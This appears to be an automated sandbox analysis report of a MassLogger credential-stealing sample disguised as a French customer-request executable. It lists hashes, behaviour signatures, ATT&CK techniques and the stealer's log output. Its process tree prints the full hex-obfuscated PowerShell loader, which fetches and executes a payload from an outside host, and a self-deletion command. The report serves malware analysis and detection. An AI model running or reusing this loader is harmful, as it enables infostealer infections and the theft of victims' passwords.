Overview

overview

10

Static

static

Clasquin F...15.exe

windows7_x64

10

Clasquin F...15.exe

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 10:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe

  • Size

    19KB

  • MD5

    36117a183609bb6953d3f78bb45ee5b9

  • SHA1

    0d89d56bac5838a3f0854e43b42e564d290f4935

  • SHA256

    3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1

  • SHA512

    79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2

Score
10/10
ransomwarespywarestealermasslogger

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\42EF15E83D\Log.txt

Family

masslogger

Ransom Note
<|| v2.1.0.0 ||> User Name: Admin IP: 154.61.71.13 Location: United States Windows OS: Microsoft Windows 7 Professional 64bit Windows Serial Key: HYF8J-CVRMY-CM74G-RPHKF-PW487 CPU: Persocon Processor 2.5+ GPU: Standard VGA Graphics Adapter AV: NA Screen Resolution: 1280x720 Current Time: 7/31/2020 12:58:24 PM MassLogger Started: 7/31/2020 12:58:18 PM Interval: 96 hour MassLogger Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MassLogger Melt: true MassLogger Exit after delivery: false As Administrator: True Processes: <|| WD Exclusion ||> Disabled <|| Binder ||> Disabled <|| Downloader ||> Disabled <|| USB Spread ||> Disabled <|| Bot Killer ||> Disabled <|| Window Searcher ||> Disabled <|| Search And Upload ||> Disabled <|| Telegram Desktop ||> Not Installed <|| Pidgin ||> Not Installed <|| FileZilla ||> Not Installed <|| Discord Tokken ||> Not Installed <|| NordVPN ||> Not Installed <|| Outlook ||> Not Installed <|| FoxMail ||> Not Installed <|| Thunderbird ||> Not Installed <|| FireFox ||> Not Found <|| QQ Browser ||> Not Installed <|| Chromium Recovery ||> Not Installed or Not Found <|| Keylogger And Clipboard ||> Disabled

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of SetThreadContext 1 IoCs
  • MassLogger log file 1 IoCs

    Detects a log file produced by MassLogger.

  • Drops file in System32 directory 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

    stealerspywaremasslogger

Processes

  • C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
    "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
    1⤵
      PID:1108
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetThreadContext
      • Drops file in System32 directory
      PID:752
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c start /b powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            • Drops file in System32 directory
            PID:1204

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      Download Submit
    • memory/1204-8-0x0000000000000000-mapping.dmp
      Download
    • memory/1204-9-0x0000000000000000-mapping.dmp
      Download
    • memory/1220-3-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

      Download
    • memory/1220-4-0x000000000049424E-mapping.dmp
      Download
    • memory/1220-5-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

      Download
    • memory/1220-6-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

      Download
    • memory/1976-7-0x0000000000000000-mapping.dmp
      Download